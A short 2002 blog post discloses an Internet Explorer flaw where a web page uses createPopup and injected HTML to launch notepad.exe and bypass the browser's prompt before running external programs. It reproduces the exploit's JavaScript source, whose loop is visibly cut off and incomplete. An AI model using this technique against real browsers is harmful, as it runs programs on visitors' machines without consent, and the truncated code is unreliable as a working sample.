This page will open a copy of notepad.exe on your Win2k/XP (and probably '98) system in IE 5.5, and 6.0. It also seems to work around any security settings in the browser; I have IE set to prompt me any time a script calls an external program - IE completely ignored the security settings and ran the program happily.
Good to see such things out of a company that's focussing on security. Here's the source, so you don't have to go to the site:
var programName=new Array(
'c:/windows/system32/notepad.exe',
'c:/winnt/system32/notepad.exe'
);
function Init(){
var oPopup=window.createPopup();
var oPopBody=oPopup.document.body;
var n,html='';
for(n=0;n
oPopBody.innerHTML=html;
oPopup.show(290, 190, 200, 200, document.body);
}

>> Darren » Monday, March 4, 2002 10:02 AM
>> arcterex » Monday, March 4, 2002 11:30 AM
>> Darren » Monday, March 4, 2002 11:45 AM
Post a comment
* under no circumstances will your email address be traded for a sack of quarters. No-sirree.